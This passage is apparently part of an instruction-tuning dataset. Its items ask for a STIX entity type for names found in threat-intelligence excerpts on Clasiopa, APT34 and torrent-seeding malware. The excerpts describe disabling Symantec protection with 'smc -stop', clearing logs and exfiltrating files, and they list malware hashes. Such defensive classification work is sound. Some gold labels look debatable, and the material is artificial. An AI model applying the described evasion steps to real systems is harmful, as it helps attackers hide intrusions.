"input": "### Entity:\nJiangsu\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nDomino\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSepMasterService\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nSeeding malicious torrents\nVictims are also used to seed both the torrents used by the malware and the malicious torrents that help spread it. Infected hosts get a list of magnet URIs from %C&C%/magnets, download them all and keep seeding them. This ensures that these files are widely available for others to download, which helps speed up the downloads and provides redundancy.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nMicrosoft\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\npsgfilter.dll\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAPT34\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nDevicesSrv.exe\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- 